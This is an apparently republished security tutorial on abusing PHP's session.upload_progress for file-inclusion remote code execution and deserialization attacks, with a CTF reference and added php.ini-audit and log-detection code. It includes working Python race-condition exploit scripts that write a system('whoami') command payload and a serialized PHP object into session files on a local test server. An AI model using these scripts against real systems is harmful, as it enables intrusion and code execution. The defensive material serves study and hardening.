2025-03-27 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how session.upload_progress can be used for file inclusion and deserialization attacks. The content is of high quality, so the editor shares it for your reference; I hope you will have a solid understanding of the relevant knowledge after reading it.
Preface
What follows mainly uses PHP's session.upload_progress feature as a springboard for exploiting file inclusion and deserialization vulnerabilities. Since this first requires some knowledge of sessions and session deserialization, those are introduced first.
session.upload_progress in PHP
This feature was added in PHP 5.4, so anyone testing along should check their PHP version.
php.ini has the following default options:
1. session.upload_progress.enabled = On
2. session.upload_progress.cleanup = On
3. session.upload_progress.prefix = "upload_progress_"
4. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
5. session.upload_progress.freq = "1%"
6. session.upload_progress.min_freq = "1"
Only the first four of these options matter here; they are explained in turn.
enabled=On means the upload_progress feature is active: when the browser uploads a file to the server, PHP stores the details of the upload (start time, progress, file name and so on) in the session.
cleanup=On means that PHP removes the upload progress data from the corresponding session file as soon as the upload finishes. This option is very important.
name is the form field name; when a field with that name is present in the upload form, PHP records the upload progress. The biggest advantage is that its value is controllable by the client.
prefix+name is used as the key name inside the session.
Session related configuration and session deserialization
Since this is not the focus of this article, several related links are attached here.
https://www.cnblogs.com/iamstudy/articles/php_serialize_problem.html
https://blog.spoock.com/2016/10/16/php-serialize-problem/?utm_source=tuicool&utm_medium=referral
In addition, one important option in the session configuration should be noted.
session.use_strict_mode defaults to Off. Off means that we can choose the session id ourselves through the Cookie. This is crucial and will be used below.
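A small audit of the settings just described, added here as an example and not part of the original article: it reads php.ini text, applies the defaults the article lists for any setting that is absent, and reports each setting whose value still leaves the technique possible. The two ini fragments are constructed; the hardened one turns off session.upload_progress (appropriate only when the application does not rely on progress reporting) and turns on session.use_strict_mode so that a client cannot pick its own session id.

```python
"""Audit php.ini text for the session settings discussed above (added example)."""

# Value that removes the condition the technique needs, per setting.
EXPECTED = {
    "session.upload_progress.enabled": "off",  # nothing from an upload lands in the session
    "session.upload_progress.cleanup": "on",   # progress data removed as soon as the upload ends
    "session.use_strict_mode": "on",           # server rejects client-chosen session ids
    "session.auto_start": "off",               # no session file for scripts that never start one
}

# PHP defaults as listed in the article, used when a key is missing from the file.
DEFAULTS = {
    "session.upload_progress.enabled": "on",
    "session.upload_progress.cleanup": "on",
    "session.use_strict_mode": "off",
    "session.auto_start": "off",
}


def parse_ini(text):
    """Return {key: value} for 'key = value' lines; ';' comments and [sections] are skipped."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"').lower()
    return settings


def normalise_bool(value):
    """php.ini accepts on/off, yes/no, true/false and 1/0 for boolean settings."""
    return "on" if value in ("1", "on", "yes", "true") else "off"


def audit(text):
    """Return (setting, current, expected) triples for every weak setting."""
    settings = parse_ini(text)
    findings = []
    for key, wanted in EXPECTED.items():
        current = normalise_bool(settings.get(key, DEFAULTS[key]))
        if current != wanted:
            findings.append((key, current, wanted))
    return findings


# Constructed fragment 1: the defaults named in the article.
WEAK_INI = """
[Session]
session.upload_progress.enabled = On
session.upload_progress.cleanup = On
session.upload_progress.prefix = "upload_progress_"
session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"
session.use_strict_mode = 0
"""

# Constructed fragment 2: the same settings hardened.
HARDENED_INI = """
[Session]
session.upload_progress.enabled = Off   ; progress tracking not needed by this application
session.upload_progress.cleanup = On
session.use_strict_mode = 1             ; session ids must be issued by the server
session.auto_start = 0
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini))
```

Running the block prints two findings for the weak fragment (enabled and use_strict_mode) and none for the hardened one. Note that session.upload_progress.cleanup=On is kept in both: it is what forces the race in the first place, so leaving it on and removing the other preconditions is the right combination.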
Using session.upload_progress for file inclusion
Test environment
PHP 5.5.38
Win10
All session-related configuration left at default values
Sample code
As you can see, there is a file inclusion vulnerability, but no malicious file exists that could be included. In fact, we can use session.upload_progress to write malicious statements into the session file and then include the session file. For this you need to know where session files are stored.
Analysis
Question one
How is a session file created when the code never calls session_start()?
Answer one
If session.auto_start=On, PHP automatically initializes the session when it receives a request, so session_start() is not needed. By default, however, this option is off.
However, the session configuration has another default that helps: session.use_strict_mode is 0, so users can define their own session id. For example, setting PHPSESSID=TGAO in the Cookie makes PHP create the file /tmp/sess_TGAO on the server. Even if the script never initializes the session, PHP initializes it automatically, generates a key consisting of ini_get("session.upload_progress.prefix") followed by the session.upload_progress.name value we supplied, and finally writes it into the sess_ file.
Question two
But here comes the problem: the default configuration session.upload_progress.cleanup = On causes the upload progress data in the session file to be cleared as soon as the upload finishes.
How can RCE still be achieved?
Answer two
At this point we can use a race condition: include the session file and use its contents before they are cleaned up.
Use the script

# coding=utf-8
import io
import requests
import threading

sessid = 'TGAO'
data = {"cmd": "system('whoami');"}


def write(session):
    # keeps uploading so that the session file is repeatedly rewritten
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        # the PHP_SESSION_UPLOAD_PROGRESS value (the PHP payload) is not preserved on the page
        resp = session.post('http://127.0.0.1:5555/test56.php',
                            data={'PHP_SESSION_UPLOAD_PROGRESS': ''},
                            files={'file': ('tgao.txt', f)},
                            cookies={'PHPSESSID': sessid})


def read(session):
    # keeps including the session file until the uploaded name shows up in the response
    while True:
        resp = session.post('http://127.0.0.1:5555/test56.php?file=session/sess_' + sessid, data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+] retry")


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()
The effect is as follows
CTF problem
Recently the National College Student Information Security Contest had a problem called justsoso; the code of one page is as follows.
As you can see from the first few lines of the code, the scenario is similar to the previous example, except that the variable $file is filtered, which does not matter.
The same idea applies, so it is not repeated here; write-ups are available online.
Summary
Exploitation conditions
1. There is a file inclusion vulnerability.
2. The session file storage path is known (the default path can be tried).
3. The session file is readable and writable.
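Detection logic for the race described above and for the conditions just listed, as an added example that is not part of the original article: it parses constructed access-log lines in combined log format (the IPs, timestamps and script name are made up) and flags the two halves of the technique, a query string that names a session file and a burst of POSTs to one script from one client.

```python
"""Flag access-log patterns matching the session.upload_progress race (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# A query-string value that names a session file or a session directory is the
# include half of the race; the exact patterns here are an assumption.
SESSION_FILE_RE = re.compile(r"sess_|/tmp/|session/", re.I)


def parse_line(line):
    """Return a dict with ip, time, method, path, script and query, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["script"], _, rec["query"] = rec["path"].partition("?")
    return rec


def detect(lines, burst_threshold=20, window_seconds=5):
    """Return alerts as (kind, ip, detail) tuples.

    'session-include': a request whose query string points at a session file.
    'upload-burst': more than burst_threshold POSTs from one ip to one script
    inside window_seconds, which is what the writer threads above produce.
    """
    alerts = []
    posts = defaultdict(list)  # (ip, script) -> timestamps of POST requests
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if SESSION_FILE_RE.search(rec["query"]):
            alerts.append(("session-include", rec["ip"], rec["path"]))
        if rec["method"] == "POST":
            posts[(rec["ip"], rec["script"])].append(rec["time"])
    for (ip, script), times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > burst_threshold:
                alerts.append(("upload-burst", ip, script))
                break
    return alerts


# Constructed sample: one normal visitor, then 25 upload POSTs and one include request.
SAMPLE_LOG = (
    ['198.51.100.7 - - [06/May/2019:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"']
    + ['203.0.113.5 - - [06/May/2019:10:00:01 +0000] "POST /test56.php HTTP/1.1" 200 20 "-" "python-requests/2.21"'] * 25
    + ['203.0.113.5 - - [06/May/2019:10:00:02 +0000] "POST /test56.php?file=session/sess_TGAO HTTP/1.1" 200 340 "-" "python-requests/2.21"']
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The burst rule is the weaker signal (legitimate upload clients can retry), so it is best treated as corroboration for the query-string rule rather than as an alert on its own; the threshold and window are parameters for that reason.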
Deserialization attacks using session.upload_progress
Test environment
PHP 5.5.38
Win10
session.serialize_handler=php_serialize; other session-related configuration left at default values
Sample code analysis
Question one
No parameter in the whole code is under user control. How can deserialization be exploited?
Answer one
Here a file is uploaded with PHP_SESSION_UPLOAD_PROGRESS set; the file name is controllable, so a malicious serialized string can be placed there and written into the session file.
In addition, as in the file inclusion case, a race is needed.
Scripts
First, the malicious serialized string is constructed with the exp.php script.
Then the exp.py script is used to race.
# coding=utf-8
import requests
import threading
import io
import sys

et = threading.Event()  # waited on in exp(); the code that sets it is not part of this listing


def exp(ip, port):
    f = io.BytesIO(b'a' * 1024 * 1024)
    while True:
        et.wait()
        url = 'http://' + ip + ':' + str(port) + '/test5.php'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
            'DNT': '1',
            'Cookie': 'PHPSESSID=20190506',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
        }
        proxy = {
            'http': '127.0.0.1:8080'
        }
        data = {'PHP_SESSION_UPLOAD_PROGRESS': '123'}
        files = {
            # the serialized object travels in the file name, which PHP stores in the session
            'file': (r'|O:4:\"Door\":1:{s:6:\"handle\";O:2:\"IP\":1:{s:2:\"ip\";s:10:\"phpinfo();\";}}', f, 'text/plain')
        }
        resp = requests.post(url, headers=headers, data=data, files=files, proxies=proxy)  # , proxies=proxy
        resp.encoding = "utf-8"
        if len(resp.text):  # the listing ends here on the page
            pass